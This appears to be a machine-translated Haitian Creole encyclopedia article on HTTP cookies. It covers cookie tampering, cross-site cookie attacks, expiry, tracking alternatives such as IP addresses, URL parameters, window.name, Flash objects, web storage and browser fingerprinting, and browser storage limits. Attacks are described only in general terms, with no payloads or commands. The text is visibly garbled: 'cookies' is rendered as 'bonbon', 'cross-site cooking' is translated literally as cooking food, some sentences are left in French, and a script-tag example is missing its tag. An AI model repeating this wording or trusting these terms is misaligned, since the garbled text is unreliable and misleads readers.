Modifikasyon nan kontni: yon atakè voye yon bonbon ki pa valab nan yon sèvè, petèt ki fèt ak yon bonbon valab ki voye pa sèvè a.

Chanje bonbon

Le pli vit ke bonbon yo bezwen yo dwe estoke epi retounen san okenn chanjman nan sèvè a, yon atakè ka modifye valè a nan bonbon yo anvan yo voye yo tounen nan sèvè a. Pou egzanp, si yon bonbon gen valè total itilizatè a dwe peye pou atik yo mete nan charyo magazen an, chanje valè sa a ekspoze sèvè a risk pou yo chaje atakè a mwens pase pri a kòmanse. Pwosesis modifye valè bonbon yo rele anpwazònman bonbon epi yo ka itilize apre vòl bonbon pou fè atak la pèsistan.

Nan metòd la ranvwaye bonbon, atakè a eksplwate yon glitch navigatè a voye yon bonbon valab nan sèvè a.

Pifò sit entènèt, sepandan, sèlman sere yon ID sesyon - yon nimewo inik ki te pwodwi owaza yo itilize pou idantifye itilizatè a sesyon - nan bonbon nan tèt li, pandan y ap tout lòt enfòmasyon yo estoke sou sèvè a. Nan ka sa a, pwoblèm sa a se lajman rezoud.

Manyen bonbon ant sit entènèt

Chak sit dwe gen pwòp bonbon li yo, kidonk yon sit pa ta dwe kapab modifye oswa kreye bonbon ki asosye ak yon lòt sit. Yon defo sekirite navigatè entènèt ka pèmèt sit move kraze règ sa a. Se eksplwatasyon an nan yon defo sa yo souvan refere yo kòm kwa-sit pou kwit manje. Objektif atak sa yo ka se vòl idantite sesyon.

Itilizatè yo ta dwe itilize dènye vèsyon navigatè entènèt yo kote vilnerabilite sa yo nòmalman elimine.

Eta konfli ant kliyan ak sèvè

Itilizasyon bonbon yo ka jenere yon kontradiksyon ant eta kliyan an ak eta ki estoke nan bonbon an. Si itilizatè a achte yon bonbon epi klike sou bouton "Retounen" navigatè a, eta a nan navigatè a jeneralman pa menm jan ak anvan akizisyon sa a. Pou egzanp, si yo kreye panyen an nan yon magazen sou entènèt lè l sèvi avèk bonbon, sa ki nan panyen an pa ka chanje lè itilizatè a retounen nan istwa navigatè a: si itilizatè a peze yon bouton pou ajoute yon atik nan panyen an epi klike sou "Retounen". " bouton, atik la rete nan yon sèl sa a. Sa a ka pa entansyon an nan itilizatè a, ki sètènman vle anile adisyon a nan atik la. Sa a ka mennen nan enfiyabilite, konfizyon, ak pinèz. Se konsa, devlopè entènèt yo ta dwe okouran de pwoblèm sa a epi aplike mezi pou jere sitiyasyon tankou sa a.

Bonbon ekspirasyon

Ekspè sekirite konfidansyalite yo kritike bonbon ki pèsistan paske yo pa ekspire ase, kidonk pèmèt sit entènèt yo swiv itilizatè yo epi bati pwofil yo sou tan. Aspè sa a nan bonbon se tou yon pati nan pwoblèm nan detounman sesyon, paske yon bonbon pèsistan yo vòlè li ka itilize yo pèsonalite yon itilizatè pou yon peryòd de tan konsiderab.

Pou li tou: GAFAM: kiyes yo ye? Poukisa yo (pafwa) pè konsa?

Altènatif pou bonbon

Gen kèk operasyon ki ka fèt lè l sèvi avèk bonbon yo ka fèt tou lè l sèvi avèk lòt mekanis ki kontoune bonbon oswa rkree bonbon efase, ki kreye pwoblèm vi prive menm jan an (oswa pafwa pi mal paske Lè sa a, envizib) pase bonbon.

Adrès IP

Itilizatè yo ka swiv ak adrès IP òdinatè ki rele paj la. Teknik sa a te disponib depi entwodiksyon nan World Wide Web, kòm paj yo telechaje sèvè a mande adrès IP nan òdinatè a ki kouri navigatè a oswa proxy, si pa gen okenn yo itilize. Sèvè a ka swiv enfòmasyon sa yo si wi ou non gen bonbon nan itilize. Sepandan, adrès sa yo anjeneral mwens serye nan idantifye yon itilizatè pase bonbon paske òdinatè ak proxy yo ka pataje pa plizyè itilizatè, epi menm òdinatè a ka resevwa yon adrès IP diferan nan chak sesyon travay (tankou c souvan ka a pou koneksyon telefòn) .

Swiv pa adrès IP yo ka serye nan kèk sitiyasyon, tankou koneksyon bande ki kenbe menm adrès IP la pou yon tan long, osi lontan ke pouvwa a sou.

Gen kèk sistèm tankou Tor yo fèt pou kenbe anonimite entènèt la epi fè swivi pa adrès IP enposib oswa enposib.

URL

Yon teknik ki pi presi baze sou entegre enfòmasyon nan URL yo. Pati nan fisèl rechèch nan URL la se yon teknik ki tipikman itilize pou objektif sa a, men lòt pati yo ka itilize tou. Tou de mekanis Java serverlet la ak sesyon PHP yo itilize metòd sa a si bonbon yo pa pèmèt.

Metòd sa a enplike sèvè wèb la ajoute demann fisèl nan lyen yo nan paj wèb la ki pote li lè yo voye li nan navigatè a. Lè itilizatè a swiv yon lyen, navigatè a retounen fisèl la rechèch tache nan sèvè a.

Chèy rechèch yo itilize pou objektif sa a ak bonbon yo sanble anpil, tou de yo se enfòmasyon abitrèman chwazi pa sèvè a epi retounen pa navigatè a. Sepandan, gen kèk diferans: lè yon URL ki gen yon seri rechèch yo reitilize, yo voye menm enfòmasyon an sou sèvè a. Pa egzanp, si preferans yon itilizatè yo kode nan yon seri rechèch nan yon URL epi itilizatè a voye URL sa a bay yon lòt itilizatè pa imel, itilizatè sa a pral kapab tou sèvi ak preferans sa yo.

Nan lòt men an, lè yon itilizatè jwenn aksè nan menm paj la de fwa, pa gen okenn garanti ke yo pral itilize fisèl la menm rechèch tou de fwa. Pa egzanp, si yon itilizatè ateri sou yon paj ki soti nan yon paj sit entèn la premye fwa epi li ateri sou menm paj la soti nan yon paj ekstèn yon dezyèm fwa, chèn rechèch la konsènan paj sit la tipikman diferan, pandan y ap bonbon yo se menm bagay la. .

Lòt dezavantaj fisèl rechèch yo gen rapò ak sekirite: kenbe done ki idantifye yon sesyon nan fisèl rechèch pèmèt oswa senplifye atak fikse sesyon, atak referans idantifyan, ak lòt exploit. Pase ID sesyon yo kòm bonbon HTTP pi an sekirite.

Jaden fòm kache

Yon fòm swiv sesyon, ki itilize pa ASP.NET, se sèvi ak fòm entènèt ak jaden kache. Teknik sa a sanble anpil ak lè l sèvi avèk kòd URL rechèch pou pote enfòmasyon epi li gen menm avantaj ak dezavantaj yo; epi si fòm nan trete ak metòd HTTP GET la, jaden yo aktyèlman vin yon pati nan URL la nan navigatè a ki pral voye li lè w ap soumèt fòm nan. Men, pifò fòm yo trete ak HTTP POST, ki lakòz enfòmasyon fòm yo, ki gen ladan jaden kache, yo dwe ajoute kòm yon opinyon adisyonèl ki pa ni yon pati nan URL la ni yon bonbon.

Apwòch sa a gen de avantaj nan yon pèspektiv swiv: premye, swiv enfòmasyon yo mete nan kòd sous HTML la ak opinyon POST olye ke URL la pral pèmèt itilizatè an mwayèn pou evite swiv sa a; Dezyèmman, enfòmasyon sesyon an pa kopye lè itilizatè a kopye URL la (pou sove paj la sou disk oswa voye li pa imel, pou egzanp).

fenèt.non

Tout navigatè entènèt komen yo ka estoke yon gwo kantite done (2MB rive 32MB) atravè JavaScript lè l sèvi avèk pwopriyete window.name DOM la. Done sa yo ka itilize olye pou yo bonbon sesyon epi yo itilize tou atravè domèn. Teknik la ka makonnen ak objè JSON pou estoke yon seri konplèks varyab sesyon bò kliyan.

Inconvénient la se ke chak fenèt oswa tab separe pral okòmansman gen yon fenèt.name vid; lè navige pa onglè (louvri pa itilizatè a) sa vle di ke onglè yo louvri endividyèlman pa pral gen yon non fenèt. Anplis de sa, window.name ka itilize pou swiv vizitè yo atravè diferan sit ki ka poze yon enkyetid sou vi prive.

Nan kèk respè sa a ka pi an sekirite pase bonbon, akòz ki pa patisipasyon nan sèvè a, kidonk fè li envulnerabl nan atak rezo a nan bonbon sniffer. Sepandan, si yo pran mezi espesyal pou pwoteje done yo, li vilnerab a plis atak, paske done yo disponib atravè lòt sit ki louvri nan menm fenèt la.

Otantifikasyon HTTP

Pwotokòl HTTP a gen ladan pwotokòl otantifikasyon aksè debaz yo ak digest otantifikasyon aksè a, ki pèmèt aksè nan yon paj wèb sèlman lè itilizatè a te bay non itilizatè a ak modpas. Si sèvè a mande yon sètifika pou bay aksè a yon paj entènèt, navigatè a mande li nan men itilizatè a epi yon fwa yo jwenn li, navigatè a estoke li epi voye li nan tout demann HTTP ki vin apre yo. Enfòmasyon sa a ka itilize pou swiv itilizatè a.

Objè lokal pataje

Si yon navigatè gen ladan Plugin Adobe Flash Player, la objè pataje lokal yo ka itilize pou menm objektif ak bonbon. Yo ka yon chwa atire pou devlopè entènèt paske:

• limit gwosè default pou yon objè lokal pataje se 100 KB;
• chèk sekirite yo separe de chèk bonbon itilizatè yo (konsa objè lokal pataje yo ka pèmèt lè bonbon yo pa).

Dènye pwen sa a, ki fè distenksyon politik jesyon bonbon ak sa ki nan objè lokal Adobe yo pataje poze kesyon konsènan jesyon an pa itilizatè a nan anviwònman vi prive li yo: li dwe konnen ke jesyon li nan bonbon pa gen okenn enpak sou jesyon an nan objè lokal pataje, ak vis vèrsa.

Yon lòt kritik nan sistèm sa a se ke li ka itilize sèlman atravè Plugin Adobe Flash Player ki se propriétaires epi li pa yon estanda entènèt.

Perseverans bò kliyan

Gen kèk navigatè entènèt ki sipòte yon mekanis pèsistans ki baze sou script, ki pèmèt paj la estoke enfòmasyon lokalman pou itilize pita. Internet Explorer, pou egzanp, sipòte enfòmasyon ki pèsiste nan istwa navigatè a, nan Bookmarks, nan yon fòma ki estoke nan XML, oswa dirèkteman ak yon paj entènèt ki sove sou disk. Pou Microsoft Internet Explorer 5, gen yon metòd itilizatè ki disponib atravè konpòtman DHTML.

W3C a te entwodui nan HTML 5 yon nouvo API JavaScript pou depo done bò kliyan yo rele Depo Entènèt epi ki vize pou ranplase bonbon pou tout tan. Li sanble ak bonbon men ak kapasite anpil amelyore epi san yo pa estoke enfòmasyon nan header demann HTTP yo. API a pèmèt de kalite depo sou entènèt: lokalstorage ak sesyon estokaj, menm jan ak bonbon ki pèsistan ak bonbon sesyon (eksepte ke cookies sesyon ekspire lè navigatè a fèmen pandan sesyon depo ekspire lè tab la fèmen), respektivman. Depo entènèt sipòte pa Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 ak Opera 10.50.

Yon mekanis diferan nòmalman depann sou kachèt navigatè (nan memwa olye ke rafrechi) lè l sèvi avèk pwogram JavaScript nan paj wèb. 

Pa egzanp, yon paj ka genyen tag la . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Nan pwen sa a, pwogram nan rete nan memwa kachèt ak paj vizite a pa rechaje yon dezyèm fwa. An konsekans, si pwogram nan gen yon varyab global (pa egzanp var id = 3243242;), idantifyan sa a rete valab epi yo ka eksplwate pa lòt kòd JavaScript yon fwa paj la chaje ankò, oswa yon fwa yo chaje yon paj ki lye pwogram nan. 

Dezavantaj nan pi gwo nan metòd sa a se ke JavaScript global varyab la dwe estatik, sa vle di li pa ka chanje oswa efase tankou yon bonbon.

anprent dijital navigatè entènèt

Yon anprent navigatè se enfòmasyon yo kolekte sou paramèt konfigirasyon yon navigatè pou rezon idantifikasyon. Anprent dwèt sa yo ka itilize pou idantifye totalman oswa pasyèlman yon itilizatè entènèt oswa yon aparèy menm lè bonbon yo enfim.

Sèvis odyans sitwèb yo kolekte enfòmasyon debaz sou konfigirasyon navigatè entènèt la depi lontan pou yo mezire avèk presizyon trafik sou entènèt moun epi pou yo detekte plizyè fòm fwod klike sou. Avèk èd langaj scripting bò kliyan, rasanble enfòmasyon pi egzak kounye a posib.

Konvèti enfòmasyon sa a nan yon ti kòd pwodui yon anprent aparèy. An 2010, Electronic Frontier Foundation (EFF) te mezire entropi anprent yon navigatè pou omwen. 18,1 Bits, e sa te anvan avans nan anprent twal te ajoute 5,7 bits nan entropi sa a.

Bonbon nan yon Nutshell

Bonbon yo se ti fichye tèks ki estoke pa navigatè entènèt la sou disk di yon vizitè sit entènèt epi yo itilize (pami lòt bagay) pou anrejistre enfòmasyon sou vizitè a oswa sou vwayaj yo atravè sit la. Webmaster a ka konsa rekonèt abitid yon vizitè ak pèsonalize prezantasyon an nan sit li pou chak vizitè; bonbon Lè sa a, li posib pou sonje konbyen atik yo montre sou paj kay la oswa menm kenbe kalifikasyon yo konekte pou nenpòt ki pati prive: lè vizitè a retounen sou sit la, li pa nesesè ankò pou li tape non li ak modpas li. dwe rekonèt, paske yo otomatikman li nan bonbon an.

Yon bonbon gen yon lavi ki limite, ki tabli pa designer sit la. Yo ka ekspire tou nan fen sesyon an sou sit la, ki koresponn ak fèmen navigatè a. Bonbon yo lajman itilize pou fè lavi vin pi fasil pou vizitè yo epi prezante yo ak plis enfòmasyon ki enpòtan. Men, teknik espesyal fè li posib yo swiv yon vizitè sou plizyè sit epi konsa yo kolekte ak kwaze enfòmasyon trè vaste sou abitid li. Metòd sa a te bay itilizasyon bonbon yon repitasyon kòm yon teknik siveyans ki vyole vi prive vizitè yo, ki malerezman koresponn ak reyalite nan anpil ka itilize pou rezon ki pa teknik oswa pa respekte atant itilizatè yo. .

An repons a laperèz lejitim sa yo, HTML 5 entwodui yon nouvo API JavaScript pou depo done bò kliyan yo rele Depo Entènèt, ki pi an sekirite epi ki gen pi gwo kapasite, ki vize ranplase bonbon.

Depo nan bonbon

Avèk kèk navigatè, yon bonbon fasil modifye, yon editè tèks senp tankou Notepad se ase pou chanje valè li yo manyèlman.

Bonbon yo sove yon fason diferan selon navigatè a:

• Microsoft Internet Explorer sove chak bonbon nan yon dosye diferan;
• Mozilla Firefox sove tout bonbon li yo nan yon sèl dosye;
• Opera sove tout bonbon li yo nan yon sèl fichye epi ankripte yo (enposib modifye yo eksepte nan opsyon lojisyèl yo);
• Apple Safari sove tout bonbon li yo nan yon sèl fichye ekstansyon .plist. Modifikasyon posib men pa trè fasil, sof si ou ale nan opsyon lojisyèl yo.

Navigatè yo oblije sipòte yon minimòm :

• 300 bonbon similtane;
• 4 o pa bonbon;
• 20 bonbon pou chak lame oswa domèn.